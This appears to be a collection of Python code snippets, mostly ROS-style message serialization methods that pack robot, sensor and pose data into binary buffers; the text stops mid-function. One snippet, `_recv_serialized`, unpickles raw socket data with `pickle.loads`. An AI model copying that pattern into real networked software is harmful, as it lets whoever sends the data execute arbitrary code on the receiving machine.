self._writeInt32(self.world.spawn[0])\n self._writeInt32(self.world.spawn[1])\n self._writeInt32(self.world.worldSurface)\n self._writeInt32(self.world.rockLayer)\n self._writeInt32(self.world.worldId)\n self._writeByte(self.world.getBossFlag())\n # write the raw name\n self._messageBuf.extend(self.world.name)\n return Message.serialize(self)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_9f.pack(_x.c0.x, _x.c0.y, _x.c0.z, _x.c1.x, _x.c1.y, _x.c1.z, _x.c2.x, _x.c2.y, _x.c2.z))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgEcdsaCertificate._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_H6B5f2Bf.pack(_x.sensorId, _x.id, _x.length, _x.width, _x.measstat, _x.existprob, _x.dynprop, _x.latdisp, _x.longdisp, _x.relxdot, _x.relxddot, _x.latspeed, _x.obsprob, _x.rollcount, _x.rcs))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n buff.write(_struct_B.pack(self.type))\n _x = self.model\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.head_version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.body_version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.arm_version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2B3i.pack(_x.has_laser, _x.has_extended_arms, _x.number_of_legs, _x.number_of_arms, _x.number_of_hands))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def bencode_buffer(data):\n\twith BytesIO() as f:\n\t\tbencode(data, f)\n\t\treturn f.getvalue()", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3B4IH3B.pack(_x.sysid, _x.compid, _x.limits_state, _x.last_trigger, _x.last_action, _x.last_recovery, _x.last_clear, _x.breach_count, _x.mods_enabled, _x.mods_required, _x.mods_triggered))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_14d.pack(_x.u0, _x.h0, _x.vl, _x.i0, _x.wv, _x.wh, _x.wi, _x.h_stop, _x.T_gap, _x.v_max, _x.v_min, _x.h_min, _x.i_max, _x.i_min))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self.time\n buff.write(_get_struct_d().pack(_x))\n length = len(self.q_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.q_target))\n length = len(self.qd_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.qd_target))\n length = len(self.qdd_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.qdd_target))\n length = len(self.i_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.i_target))\n length = len(self.m_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.m_target))\n length = len(self.q_actual)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.q_actual))\n length = len(self.qd_actual)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.qd_actual))\n length = len(self.i_actual)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.i_actual))\n length = len(self.tool_acc_values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.tool_acc_values))\n length = len(self.tcp_force)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.tcp_force))\n length = len(self.tool_vector)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.tool_vector))\n length = len(self.tcp_speed)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.tcp_speed))\n _x = self.digital_input_bits\n buff.write(_get_struct_d().pack(_x))\n length = len(self.motor_temperatures)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.motor_temperatures))\n _x = self\n buff.write(_get_struct_3d().pack(_x.controller_timer, _x.test_value, _x.robot_mode))\n length = len(self.joint_modes)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.joint_modes))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_d2H9d5fdI().pack(_x.Time, _x.Week, _x.Status, _x.RPY.x, _x.RPY.y, _x.RPY.z, _x.LLA.x, _x.LLA.y, _x.LLA.z, _x.NedVel.x, _x.NedVel.y, _x.NedVel.z, _x.YawUncertainty, _x.PitchUncertainty, _x.RollUncertainty, _x.PosUncertainty, _x.VelUncertainty, _x.SyncInTime, _x.SyncInCount))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3B4f2h3B().pack(_x.MatchMode, _x.MatchType, _x.TestMode, _x.pointA.x, _x.pointA.y, _x.pointB.x, _x.pointB.y, _x.angleA, _x.angleB, _x.idA, _x.idB, _x.kickforce))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_56B().pack(_x.command, _x.set_num, _x.paraset_byte54, _x.paraset_byte53, _x.paraset_byte52, _x.paraset_byte51, _x.paraset_byte50, _x.paraset_byte49, _x.paraset_byte48, _x.paraset_byte47, _x.paraset_byte46, _x.paraset_byte45, _x.paraset_byte44, _x.paraset_byte43, _x.paraset_byte42, _x.paraset_byte41, _x.paraset_byte40, _x.paraset_byte39, _x.paraset_byte38, _x.paraset_byte37, _x.paraset_byte36, _x.paraset_byte35, _x.paraset_byte34, _x.paraset_byte33, _x.paraset_byte32, _x.paraset_byte31, _x.paraset_byte30, _x.paraset_byte29, _x.paraset_byte28, _x.paraset_byte27, _x.paraset_byte26, _x.paraset_byte25, _x.paraset_byte24, _x.paraset_byte23, _x.paraset_byte22, _x.paraset_byte21, _x.paraset_byte20, _x.paraset_byte19, _x.paraset_byte18, _x.paraset_byte17, _x.paraset_byte16, _x.paraset_byte15, _x.paraset_byte14, _x.paraset_byte13, _x.paraset_byte12, _x.paraset_byte11, _x.paraset_byte10, _x.paraset_byte9, _x.paraset_byte8, _x.paraset_byte7, _x.paraset_byte6, _x.paraset_byte5, _x.paraset_byte4, _x.paraset_byte3, _x.paraset_byte2, _x.paraset_byte1))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _recv_serialized(self, socket):\n msg = pickle.loads(socket.recv())\n return msg", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_didid.pack(_x.distance_front, _x.angle_front, _x.distance_back, _x.angle_back, _x.turn_left))\n _x = self.turn_left_sensor\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_d.pack(self.turn_right))\n _x = self.turn_right_sensor\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def _write_message(self, message):\n raw_data = message.serialize()\n debug(\"writing outgoing message of type \" + message.__class__.__name__)\n self.request.sendall(raw_data)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2B6f2Bb().pack(_x.status, _x.index, _x.range, _x.range_rate, _x.range_accl, _x.azimuth, _x.lateral_rate, _x.width, _x.is_mr_update, _x.is_lr_update, _x.amplitude))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.x.header.seq, _x.x.header.stamp.secs, _x.x.header.stamp.nsecs))\n _x = self.x.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_7d3I().pack(_x.x.pose.position.x, _x.x.pose.position.y, _x.x.pose.position.z, _x.x.pose.orientation.x, _x.x.pose.orientation.y, _x.x.pose.orientation.z, _x.x.pose.orientation.w, _x.x_desi.header.seq, _x.x_desi.header.stamp.secs, _x.x_desi.header.stamp.nsecs))\n _x = self.x_desi.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_7d3I().pack(_x.x_desi.pose.position.x, _x.x_desi.pose.position.y, _x.x_desi.pose.position.z, _x.x_desi.pose.orientation.x, _x.x_desi.pose.orientation.y, _x.x_desi.pose.orientation.z, _x.x_desi.pose.orientation.w, _x.x_desi_filtered.header.seq, _x.x_desi_filtered.header.stamp.secs, _x.x_desi_filtered.header.stamp.nsecs))\n _x = self.x_desi_filtered.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_31d().pack(_x.x_desi_filtered.pose.position.x, _x.x_desi_filtered.pose.position.y, _x.x_desi_filtered.pose.position.z, _x.x_desi_filtered.pose.orientation.x, _x.x_desi_filtered.pose.orientation.y, _x.x_desi_filtered.pose.orientation.z, _x.x_desi_filtered.pose.orientation.w, _x.x_err.linear.x, _x.x_err.linear.y, _x.x_err.linear.z, _x.x_err.angular.x, _x.x_err.angular.y, _x.x_err.angular.z, _x.xd.linear.x, _x.xd.linear.y, _x.xd.linear.z, _x.xd.angular.x, _x.xd.angular.y, _x.xd.angular.z, _x.xd_desi.linear.x, _x.xd_desi.linear.y, _x.xd_desi.linear.z, _x.xd_desi.angular.x, _x.xd_desi.angular.y, _x.xd_desi.angular.z, _x.F.force.x, _x.F.force.y, _x.F.force.z, _x.F.torque.x, _x.F.torque.y, _x.F.torque.z))\n length = len(self.tau_pose)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.tau_pose))\n length = len(self.tau_posture)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.tau_posture))\n length = len(self.tau)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.tau))\n length = len(self.J.layout.dim)\n buff.write(_struct_I.pack(length))\n for val1 in self.J.layout.dim:\n _x = val1.label\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_get_struct_2I().pack(_x.size, _x.stride))\n buff.write(_get_struct_I().pack(self.J.layout.data_offset))\n length = len(self.J.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.J.data))\n length = len(self.N.layout.dim)\n buff.write(_struct_I.pack(length))\n for val1 in self.N.layout.dim:\n _x = val1.label\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_get_struct_2I().pack(_x.size, _x.stride))\n buff.write(_get_struct_I().pack(self.N.layout.data_offset))\n length = len(self.N.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.N.data))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.base.header.seq, _x.base.header.stamp.secs, _x.base.header.stamp.nsecs))\n _x = self.base.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_5f.pack(_x.base.cell_width, _x.base.cell_height, _x.base.position.x, _x.base.position.y, _x.base.position.z))\n length = len(self.base.points)\n buff.write(_struct_I.pack(length))\n for val1 in self.base.points:\n _x = val1\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n length = len(self.base.intensity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *self.base.intensity))\n buff.write(_struct_b.pack(self.base.cost))\n _x = self.base.label\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2f.pack(_x.mean_height, _x.mean_intensity))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.model.header.seq, _x.model.header.stamp.secs, _x.model.header.stamp.nsecs))\n _x = self.model.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model.id))\n _x = self.model.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.model.track.header.seq, _x.model.track.header.stamp.secs, _x.model.track.header.stamp.nsecs))\n _x = self.model.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model.track.id))\n length = len(self.model.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose:\n _v1 = val1.position\n _x = _v1\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v2 = val1.orientation\n _x = _v2\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v3 = val1.stamp\n _x = _v3\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose_projected:\n _v4 = val1.position\n _x = _v4\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v5 = val1.orientation\n _x = _v5\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose_resampled:\n _v6 = val1.position\n _x = _v6\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v7 = val1.orientation\n _x = _v7\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(struct.pack(pattern, *self.model.track.pose_flags))\n length = len(self.model.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *val1.values))\n _x = self\n buff.write(_struct_3I.pack(_x.data.header.seq, _x.data.header.stamp.secs, _x.data.header.stamp.nsecs))\n _x = self.data.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data.id))\n _x = self.data.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.data.track.header.seq, _x.data.track.header.stamp.secs, _x.data.track.header.stamp.nsecs))\n _x = self.data.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data.track.id))\n length = len(self.data.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose:\n _v8 = val1.position\n _x = _v8\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v9 = val1.orientation\n _x = _v9\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v10 = val1.stamp\n _x = _v10\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose_projected:\n _v11 = val1.position\n _x = _v11\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v12 = val1.orientation\n _x = _v12\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose_resampled:\n _v13 = val1.position\n _x = _v13\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v14 = val1.orientation\n _x = _v14\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(struct.pack(pattern, *self.data.track.pose_flags))\n length = len(self.data.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *val1.values))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n length = len(self.pending)\n buff.write(_struct_I.pack(length))\n for val1 in self.pending:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v1 = val1.platform_info\n _x = _v1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v1.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v1.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v2 = _v1.icon\n _x = _v2.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v2.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v2.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v1.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v3 = val1.conn_stats\n _x = _v3\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v4 = val2.icon\n _x = _v4.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v4.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v4.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.available)\n buff.write(_struct_I.pack(length))\n for val1 in self.available:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or 